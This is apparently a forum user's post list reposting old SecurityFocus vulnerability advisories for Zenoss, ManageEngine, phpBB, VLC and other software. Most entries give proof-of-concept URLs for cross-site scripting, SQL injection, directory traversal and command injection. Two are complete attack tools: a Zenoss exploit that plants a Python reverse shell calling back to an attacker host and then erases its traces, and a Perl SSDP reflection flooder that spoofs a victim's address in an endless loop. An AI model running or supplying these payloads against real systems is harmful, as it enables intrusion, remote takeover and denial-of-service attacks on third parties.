HireHackking
Members
-
Joined
-
Last visited
Everything posted by HireHackking
-
source: https://www.securityfocus.com/bid/54727/info Scrutinizer is prone to an authentication-bypass vulnerability. Exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions. Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. #Request POST /cgi-bin/admin.cgi HTTP/1.1 Host: 10.70.70.212 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Length: 70 tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1 #Response HTTP/1.1 200 OK Date: Wed, 25 Apr 2012 17:52:15 GMT Server: Apache Vary: Accept-Encoding Content-Length: 19 Content-Type: text/html; charset=utf-8 {"new_user_id":"2"} -
source: https://www.securityfocus.com/bid/54733/info DataWatch Monarch Business Intelligence is prone to multiple input validation vulnerabilities. Successful exploits will allow an attacker to manipulate the XPath query logic to carry out unauthorized actions on the XML documents of the application. It will also allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. DataWatch Monarch Business Intelligence 5.1 is vulnerable; other versions may also be affected. http://www.example.com/ESAdmin/jsp/tabview.jsp?mode=add</script><script>alert(1)</script>&type=2&renew=1&pageid=PAGE_MPROCESS http://www.example.com/ESClient/jsp/customizedialog.jsp?templateType=-1&doctypeid=122&activetab=DM_DOCUMENT_LIST&fields=filter;sort;summary;&searchtype=document'&doclist.jsp
-
source: https://www.securityfocus.com/bid/54786/info tekno.Portal is prone to an SQL-injection vulnerability. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. tekno.Portal 0.1b is vulnerable; other versions may also be affected. http://www.example.com/teknoportal/link.php?kat=[Blind SQL Injection]
-
source: https://www.securityfocus.com/bid/54793/info Zenoss is prone to the following security vulnerabilities: 1. Multiple arbitrary command-execution vulnerabilities 2. Multiple HTML-injection vulnerabilities 3. An open-redirection vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple information-disclosure vulnerabilities 6. A code-execution vulnerability An attacker can exploit these issues to retrieve arbitrary files, redirect a user to a potentially malicious site, execute arbitrary commands, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials to perform unauthorized actions in the context of a user's session, or disclose sensitive-information. Zenoss 3.2.1 and prior are vulnerable. http://www.example.com/zport/About/showDaemonXMLConfig?daemon=uname%20-a%26 http://www.example.com/zport/dmd/Events/Users/@@eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence=&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><" http://www.example.com/zport/dmd/Events/Users/eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence=&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><" http://www.example.com/zport/dmd/Events/Status/Snmp/@@eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence="><script>alert(document.cookie)</script><" http://www.example.com/zport/dmd/ZenEventManager/listEventCommands?tableName=eventCommands&sortedHeader=primarySortKey&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><" http://www.example.com/zport/dmd/backupInfo?tableName=backupTable&sortedHeader=fileName&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script> http://www.example.com/zport/acl_users/cookieAuthHelper/login?came_from=http%3a//example%2ecom/%3f http://www.example.com/zport/About/viewDaemonLog?daemon=../../../var/log/mysqld http://www.example.com/zport/About/viewDaemonConfig?daemon=../../../../etc/syslog http://www.example.com/zport/About/editDaemonConfig?daemon=../../../../etc/syslog http://www.example.com/zport/RenderServer/plugin?name=../../../../../../tmp/arbitrary-python-file http://www.example.com/zport/dmd/ZenEventManager http://www.example.com/manage
-
source: https://www.securityfocus.com/bid/54791/info VLC Media Player is prone to a denial-of-service vulnerability. Successful exploits may allow attackers to crash the affected application, denying service to legitimate users. VLC Media Player 2.0.2 is vulnerable; other versions may also be affected. #!/usr/bin/perl my $a ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"; my $b ="\x00\x00\x00\xnn\x66\x74\x79\x70\x33\x67\x70"; my $c ="\x62\x6\x74\x77\x65\x65\x6e\x20\x74\x68\x65\x20\x68\x65\x61\x64\x65\x72\x20\x61\x6e\x64\x20\x74\x68\x65\x20\x66\x6f\x6f\x74\x65\x72\x20\x74\x68\x65\x72\x65\x27\x73\x20\x64\x61\x72\x6b\x2d\x70\x75\x7a\x7a\x6c\x65"; my $d ="\x33\x67\x70"; my $file = "darkpuzzle.3gp"; open ($File, ">$file"); print $File $a,$b,$c,$d; close ($File);
-
source: https://www.securityfocus.com/bid/54792/info ntop is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. ntop 4.0.3 is vulnerable; other versions may also be affected. http://www.example.com/plugins/rrdPlugin?action=arbreq&which=graph&arbfile=TEST">[XSS]&arbiface=eth0&start=1343344529&end=1343348129&counter=&title=Active+End+Nodes&mode=zoom
-
source: https://www.securityfocus.com/bid/54793/info Zenoss is prone to the following security vulnerabilities: 1. Multiple arbitrary command-execution vulnerabilities 2. Multiple HTML-injection vulnerabilities 3. An open-redirection vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple information-disclosure vulnerabilities 6. A code-execution vulnerability An attacker can exploit these issues to retrieve arbitrary files, redirect a user to a potentially malicious site, execute arbitrary commands, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials to perform unauthorized actions in the context of a user's session, or disclose sensitive-information. Zenoss 3.2.1 and prior are vulnerable. # Zenoss <= 3.2.1 Remote Post-Authentication Command Execution ################# # o Requires: Credentials for a user with "ZenManager" or "Manager" roles. # o Tested: Zenoss 3.2.1 # o Default port: 8080 # Brendan Coles <bcoles at gmail dot com> # 2012-03-14 ################################################################################ import socket, sys, random, time, re #verbose = True verbose = False # usage if len(sys.argv) < 6: print "Zenoss <= 3.2.1 Remote Post-Authentication Command Execution" print "[*] Usage: python "+sys.argv[0]+" <RHOST> <RPORT> <username> <password> <LHOST> <LPORT>" print "[*] Example: python "+sys.argv[0]+" 192.168.1.10 8080 zenoss zenoss 192.168.1.1 4444" sys.exit(0) # zenoss details RHOST = sys.argv[1] RPORT = int(sys.argv[2]) username = sys.argv[3] password = sys.argv[4] # reverse shell LHOST = sys.argv[5] LPORT = int(sys.argv[6]) # random file name filename = "" for i in range(0,random.randint(10,20)): filename = filename+chr(random.randint(97,122)) # connect to RHOST:RPORT try: socket.inet_aton(RHOST) except socket.error: print "[-] Error: Could not create socket." sys.exit(1) try: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((RHOST,RPORT)) except: print "[-] Error: Could not connect to server" sys.exit(1) # Login and get cookie if verbose: print "[*] Logging in" request = "GET /zport/acl_users/cookieAuthHelper/login?__ac_name="+username+"&__ac_password="+password+" HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+"\r\n\r\n" try: # send request s.sendto(request, (RHOST, RPORT)) data = s.recv(1024) if verbose: print str(data)+"\r\n" # get ginger cookie m = re.search('(__ginger_snap=".+";)', data) if not m: raise Exception("[-] Error: Could not retrieve __ginger_snap cookie value") else: ginger_cookie = str(m.group(1)) except: print "[-] Error: Login failed" sys.exit(1) # Add empty command to web interface if verbose: print "[*] Adding command to Zenoss" request = "GET /zport/dmd/ZenEventManager/commands/?id="+filename+"&manage_addCommand%3Amethod=+Add+&__ac_name="+username+"&__ac_password="+password+" HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+"\r\n\r\n" try: # send request s.sendto(request, (RHOST, RPORT)) data = s.recv(1024) if verbose: print str(data)+"\r\n" m = re.search('(Bobo-Exception-Type: Unauthorized)', data) if m: raise Exception("[-] Error: Incorrect username/password") else: print "[+] Added command to Zenoss successfully" except: print "[-] Error: Adding command to Zenoss failed" sys.exit(1) # Wait for command to be saved wait = 5 if verbose: print "[*] Waiting "+str(wait)+" seconds" time.sleep(wait) # Edit command to drop a python reverse shell request in /tmp/ if verbose: print "[*] Updating command with payload" postdata = "zenScreenName=editEventCommand.pt&enabled%3Aboolean=True&defaultTimeout%3Aint=60&delay%3Aint=1&repeatTime%3Aint=15&command=echo+%22import+socket%2Csubprocess%2Cos%3Bhost%3D%5C%22"+LHOST+"%5C%22%3Bport%3D"+str(LPORT)+"%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28host%2Cport%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B+os.dup2%28s.fileno%28%29%2C1%29%3B+os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%5C%22%2Fbin%2Fsh%5C%22%2C%5C%22-i%5C%22%5D%29%3B%22+%3E+%2Ftmp%2F"+filename+".py%20%26%26%20chmod%20%2bx%20%2Ftmp%2F"+filename+".py%20%26%26%20python%20%2Ftmp%2F"+filename+".py&clearCommand=&add_filter=&manage_editEventCommand%3Amethod=+Save+" request = "POST /zport/dmd/ZenEventManager/commands/"+filename+"?__ac_name="+username+"&__ac_password="+password+" HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+"\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(postdata))+"\r\n\r\n"+postdata try: # send request s.sendto(request, (RHOST, RPORT)) data = s.recv(1024) if verbose: print str(data)+"\r\n" # get zope cookie m = re.search('(_ZopeId=".+";)', data) if not m: raise Exception("[-] Error: Could not retrieve _ZopeId cookie value") else: zope_cookie = str(m.group(1)) print "[+] Sent payload successfully" except: print "[-] Error: Sending payload failed" sys.exit(1) # Wait for command to be saved wait = 5 if verbose: print "[*] Waiting "+str(wait)+" seconds" time.sleep(wait) # Send trigger event and get event id if verbose: print "[*] Sending trigger event" postdata = '{"action":"EventsRouter","method":"add_event","data":[{"summary":"'+filename+'","device":"'+filename+'","component":"'+filename+'","severity":"Info","evclasskey":"","evclass":""}],"type":"rpc","tid":0}' request = "POST /zport/dmd/Events/evconsole_router HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+'\r\nX-Requested-With: XMLHttpRequest\r\nCookie: '+ginger_cookie+' '+zope_cookie+'\r\nContent-Type: application/json; charset=UTF-8\r\nContent-Length: '+str(len(postdata))+'\r\n\r\n'+postdata try: # send request s.sendto(request, (RHOST, RPORT)) data = s.recv(1024) if verbose: print str(data)+"\r\n" # get trigger event id "evid" m = re.search('"evid": "(.+)"', data) evid = "" if not m: raise Exception("[-] Error: Sending trigger event failed") else: evid = str(m.group(1)) print "[+] Sent trigger event successfully" except: print "[-] Error: Sending trigger event failed" # Wait for command to execute wait = 60 if verbose: print "[*] Waiting "+str(wait)+" seconds" time.sleep(wait) # Delete trigger from web interface if verbose: print "[*] Deleting the trigger" postdata = '{"action":"EventsRouter","method":"close","data":[{"evids":["'+evid+'"],"excludeIds":{},"selectState":null,"field":"component","direction":"ASC","params":"{\\"severity\\":[5,4,3,2],\\"eventState\\":[0,1]}","asof":0}],"type":"rpc","tid":0}' request = "POST /zport/dmd/Events/evconsole_router HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+'\r\nX-Requested-With: XMLHttpRequest\r\nCookie: '+ginger_cookie+' '+zope_cookie+'\r\nContent-Type: application/json; charset=UTF-8\r\nContent-Length: '+str(len(postdata))+'\r\n\r\n'+postdata try: # send request s.sendto(request, (RHOST, RPORT)) data = s.recv(1024) if verbose: print str(data)+"\r\n" print "[+] Deleted trigger successfully" except: print "[-] Error: Deleting trigger failed" # Delete command from web interface if verbose: print "[*] Deleting the command from Zenoss" request = "GET /zport/dmd/ZenEventManager?zenScreenName=listEventCommands&redirect=false&ids%3Alist="+filename+"&id=&manage_deleteCommands%3Amethod=Delete&__ac_name="+username+"&__ac_password="+password+" HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+"\r\n\r\n" try: s.sendto(request, (RHOST, RPORT)) data = s.recv(1024) if verbose: print str(data)+"\r\n" print "[+] Deleted command from Zenoss successfully" except: print "[-] Error: Deleting command failed" print "[+] You should now have a reverse shell at "+LHOST+":"+str(LPORT) print "[+] Don't forget to delete /tmp/"+filename+".py"
-
source: https://www.securityfocus.com/bid/54805/info Elefant CMS is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Elefant CMS 1.2.0 is vulnerable; other versions may also be affected. http://www.example.com/admin/versions?id=[XSS]&type=Webpage
-
source: https://www.securityfocus.com/bid/54816/info Calligra is prone to a remote buffer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. Calligra 2.4.3 and KOffice 2.3.3 are vulnerable; other versions may also be affected. bool STD::read( U16 baseSize, U16 totalSize, OLEStreamReader* stream, bool preservePos ) ... grupxLen = totalSize - ( stream->tell() - startOffset ); grupx = new U8[ grupxLen ]; int offset = 0; for ( U8 i = 0; i < cupx; ++i) { U16 cbUPX = stream->readU16(); // size of the next UPX stream->seek( -2, G_SEEK_CUR ); // rewind the "lookahead" cbUPX += 2; // ...and correct the size for ( U16 j = 0; j < cbUPX; ++j ) { grupx[ offset + j ] = stream->readU8(); // read the whole UPX }
-
source: https://www.securityfocus.com/bid/54814/info The 'com_photo' module for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com.np/index.php?option=com_photo&task=gallery&AlbumId=8[SQL Injection] http://www.example.com/index.php?option=com_photo&action=slideview&key=16[SQL Injection]
-
source: https://www.securityfocus.com/bid/54817/info PolarisCMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/reselleradmin/blog.aspx?%27%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E http://www.example.com/reselleradmin/blog.aspx?%27onmouseover=prompt(101)%3E
-
source: https://www.securityfocus.com/bid/54812/info Worksforweb iAuto is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. Review: Add Comments - Listing <div class="addComment"> <h1>Reply to The Comment</h1> <div class="pageDescription"> <div class="commentInfo">You are replying to the comment #"><iframe src="iAuto%20%20%20Listing%20Comments%20Reply%20to%20The%20Comment-Dateien/[PERSISTENT INJECTED CODE!])' <="" to="" listing="" #448="" "<span="" class="fieldValue fieldValueYear" height="900" width="1000">2007</span> <span class="fieldValue fieldValueMake">Acura</span> 1.2 The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or highr equired user inter action. Fo demonstration or reproduce ... String: "><iframe src=http://vuln-lab.com width=1000 height=900 onload=alert("VulnerabilityLab") < Dealer > Search Sellers > City PoC: http://www.example.com/iAuto/m/users/search/?DealershipName[equal]=jamaikan-hope23&City[equal]=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+ width%3D1000+height%3D900+onload%3Dalert%28%22VulnerabilityLab%22%29+%3C&State[equal]=11&action=search Browse by Make and Model / AC Cobra / > PoC: http://www.example.com/iAuto/m/browse-by-make-model/AC+Cobra/%22%3E%3Ciframe%20src=http://vuln-lab.com%20 width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C/ Comments > Reply to The Comment > Topic & Text (commentSid) PoC: http://www.example.com/iAuto/m/comment/add/?listingSid=448&commentSid=%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000 %20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C&returnBackUri=%2Flisting%2Fcomments%2F448%2F%3F
-
source: https://www.securityfocus.com/bid/54822/info Open Constructor is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Open Constructor 3.12.0 is vulnerable; other versions may also be affected. http://www.example.com/openconstructor/users/users.php?type=multiple&keyword=<script>alert('xss')</script>
-
source: https://www.securityfocus.com/bid/54845/info Dir2web is prone to multiple security vulnerabilities, including an SQL-Injection vulnerability and an information-disclosure vulnerability. Successfully exploiting these issues allows remote attackers to compromise the software, retrieve information, modify data, disclose sensitive information, or gain unauthorized access; other attacks are also possible. Dir2web versions 3.0 is vulnerable; other versions may also be affected. http://www.example.com/index.php?wpid=homepage&oid=6a303a0aaa' OR id > 0-- -
-
source: https://www.securityfocus.com/bid/54734/info phpBB is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. phpBB 3.0.10 is vulnerable; other versions may also be affected. Request : --- POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174 Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid= Content-Type: application/x-www-form-urlencoded Content-Length: 258 Connection: close viewemail=1 &massemail=1 &allowpm=1 &hideonline=0 ¬ifypm=1 &popuppm=0 &lang=en &style=%2b1111111111 &tz=0 &dst=0 &dateoptions=D+M+d%2C+Y+g%3Ai+a &dateformat=D+M+d%2C+Y+g%3Ai+a &submit=Submit &creation_time=1343370877 &form_token=576...
-
source: https://www.securityfocus.com/bid/54822/info Open Constructor is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Open Constructor 3.12.0 is vulnerable; other versions may also be affected. http://www.example.com/openconstructor/data/file/edit.php?result=<script>aler('xss')</script>&id=new&ds_id=8&hybridid=&fieldid=&callback=&type=txt&name=test&description=test&fname=test&create=Save
-
source: https://www.securityfocus.com/bid/54822/info Open Constructor is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Open Constructor 3.12.0 is vulnerable; other versions may also be affected. http://www.example.com/openconstructor/confirm.php?q=<script>alert('XSS')</script>skin=metallic
-
source: https://www.securityfocus.com/bid/54739/info JW Player is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Note: The vulnerability related to 'logo.link' parameter has been moved to BID 55199 for better documentation. http://www.example.com/player.swf?playerready=alert(document.cookie)
-
source: https://www.securityfocus.com/bid/54757/info Distimo Monitor is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Distimo Monitor 6.0 is vulnerable; other versions may also be affected. https://www.example.com/downloads/date/metric:1/country:29/application:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/appstore:1 https://www.example.com/downloads/date/metric:1/country:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/application:99/appstore:1 https://www.example.com/downloads/map/metric:%3E%22%3Ciframe%20src=http://www.example1.com%3E+%3E%22%3Ciframe%20src=http://www.example1.com%3E https://www.example.com/revenue/date/application:99/country:%3E%22%3Ciframe%20src=http://www.example1.com%3E%3E%22%3Ciframe%20src=http://www.example1.com%3E https://www.example.com/revenue/date/application:%3E%22%3Ciframe%20src=http://www.example1.com%3E%3E%22%3Ciframe%20src=http://www.example1.com/country:30
-
source: https://www.securityfocus.com/bid/54741/info eNdonesia is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. eNdonesia 8.5 is vulnerable; other versions may also be affected. http://www.example.com/eNdonesia/mod.php?mod=diskusi&op=viewcat&cid=-[id][SQL INJECTION]
-
source: https://www.securityfocus.com/bid/54756/info ManageEngine Applications Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. ManageEngine Applications Manager 10.0 is vulnerable; other versions may also be affected. http://www.example.com/mobile/DetailsView.do?method=showMGDetails&groupId=10003645+UnION+SelEct+group_concat(table_NAME),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+WHERE+table_schema=database()--%20- http://www.example.com/mobile/Search.do?method=mobileSearch&requestid=[SQL INJECTION]mobileSearchPage&viewName=Search
-
source: https://www.securityfocus.com/bid/54753/info Limny is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Limny 3.3.1 is vulnerable; other versions may also be affected. http://www.example.com/limny-3.3.1/index.php?q=-1' or 57 = '55 [SQL
-
source: https://www.securityfocus.com/bid/54759/info ManageEngine Applications Manager is prone to multiple SQL-injection and multiple cross-site scripting vulnerabilities. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ManageEngine Applications Manager 10.0 is vulnerable; prior versions may also be affected. http://www.example.com/MyPage.do?method=viewDashBoard&forpage=1&addNewTab=true&selectedpageid=10000017+AND+1=1--%20-[BLIND SQL-INJECTION] http://www.example.com/jsp/RCA.jsp?resourceid=10000624&attributeid=1900&alertconfigurl=%2FshowActionProfiles.do%3Fmethod%3DgetResourceProfiles%26admin%3Dtrue%26all%3Dtrue%26resourceid%3D-10000624'+AND+substring(version(),1)=4 [BLIND SQL-INJECTION]&Sat%20Jun%2023%202012%2000:47:25%20GMT+0200%20(EET) http://www.example.com/showCustom.do?resourcename=null&type=EC2Instance&original_type=EC2Instance&name=&moname=i-3a96b773&tabId=1&baseid=10000015&resourceid=10000744&monitorname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&method=showDataforConfs http://www.example.com/MyPage.do?method=viewDashBoard&forpage=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&addNewTab=true&selectedpageid=10000014 http://www.example.com/jsp/ThresholdActionConfiguration.jsp?resourceid=10000055&attributeIDs=101&attributeToSelect=101&redirectto=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C http://www.example.com/showresource.do?resourceid=10000189&type=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&moname=DNS+monitor&method=showdetails&resourcename=DNS+monitor&viewType=showResourceTypes http://www.example.com/jsp/ThresholdActionConfiguration.jsp?resourceid=10000055&attributeIDs=101&attributeToSelect=101%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&redirectto=/common/serverinfo.do http://www.example.com/ProcessTemplates.do?method=createProcessTemplate&templatetype=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
-
# Title: Notepad++ - Crash # Date: 10/07/2015 # Author: Rahul Pratap Singh (@0x62626262) # Vendor Homepage: https://notepad-plus-plus.org # Download: https://notepad-plus-plus.org/download/v6.7.3.html # Version: v6.7.3 # Tested on: Windows_XP_x86 & Windows_7_x86 Incorrect theme file parsing, that leads to crash. -Create a .xml file with numbereous "A" (around 1000) in it and save as test.xml -Go to this directory in windows "/appdata/roaming/notepad++/themes/" and paste above test.xml file in this theme folder and restart notepad++ -Now start notepad++ and in menu tab, go in settings and then select style configurator and now select test file in theme select option -Now hit "save and close" button, it will crash with an error message Thanks Rahul Pratap Singh
-
#!/usr/bin/perl # # upnpd M-SEARCH ssdp:discover reflection # # Copyright 2015 (c) Todor Donev # todor.donev@gmail.com # http://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # # The SSDP protocol can discover Plug & Play devices, # with uPnP (Universal Plug and Play). SSDP is HTTP # like protocol and work with NOTIFY and M-SEARCH # methods. # # # Disclaimer: # This or previous program is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use at your own risk and educational # purpose ONLY! # # Wireshark: # udp.port eq 1900 || frame contains "HTTP/1.1 200 OK" # # See also: # SSDP Reflection DDoS Attacks # http://tinyurl.com/mqwj6xt # use Socket; if ( $< != 0 ) { print "Sorry, must be run as root!\n"; print "This script use RAW Socket.\n"; exit; } my $ssdp = (gethostbyname($ARGV[0]))[4]; # IP Address Source (32 bits) my $victim = (gethostbyname($ARGV[1]))[4]; # IP Address Source (32 bits) print "[ upnpd M-SEARCH ssdp:discover reflection ]\n"; if (!defined $ssdp || !defined $victim) { print "[ Usage: $0 <upnpd> <victim>\n"; print "[ <todor.donev\@gmail.com> Todor Donev ]\n"; exit; } print "[ Sending SSDP packets: $ARGV[0] -> $ARGV[1]\n"; socket(RAW, PF_INET, SOCK_RAW, 255) or die $!; setsockopt(RAW, 0, 1, 1) or die $!; main(); # Main program sub main { my $packet; $packet = iphdr(); $packet .= udphdr(); $packet .= payload(); # b000000m... send_packet($packet); } # IP header (Layer 3) sub iphdr { my $ip_ver = 4; # IP Version 4 (4 bits) my $iphdr_len = 5; # IP Header Length (4 bits) my $ip_tos = 0; # Differentiated Services (8 bits) my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits) my $ip_frag_id = 0; # Identification Field (16 bits) my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits) my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits) my $ip_ttl = 255; # IP TTL (8 bits) my $ip_proto = 17; # IP Protocol (8 bits) my $ip_checksum = 0; # IP Checksum (16 bits) # IP Packet construction my $iphdr = pack( 'H2 H2 n n B16 h2 c n a4 a4', $ip_ver . $iphdr_len, $ip_tos, $ip_total_len, $ip_frag_id, $ip_frag_flag . $ip_frag_offset, $ip_ttl, $ip_proto, $ip_checksum, $victim, $ssdp ); return $iphdr; } # UDP header (Layer 4) sub udphdr { my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535) my $udp_dst_port = 1900; # UDP Dest Port (16 btis) (0-65535) my $udp_len = 8 + length(payload()); # UDP Length (16 bits) (0-65535) my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header) # UDP Packet my $udphdr = pack( 'n n n n', $udp_src_port, $udp_dst_port, $udp_len, $udp_checksum ); return $udphdr; } # SSDP HTTP like (Layer 7) sub payload { my $data; $data .= "M-SEARCH * HTTP\/1.1\r\n"; # $data .= "HOST:239.255.255.250:1900\r\n"; # Multicast address $data .= "ST:upnp:rootdevice\r\n"; # Search target, search for root devices only $data .= "MAN:\"ssdp:discover\"\r\n"; # $data .= "MX:3\r\n\r\n"; # Seconds to delay response my $payload = pack('a' . length($data), $data); return $payload; } sub send_packet { while(1){ select(undef, undef, undef, 0.10); # Sleeping 100 milliseconds send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ssdp)) or die $!; } }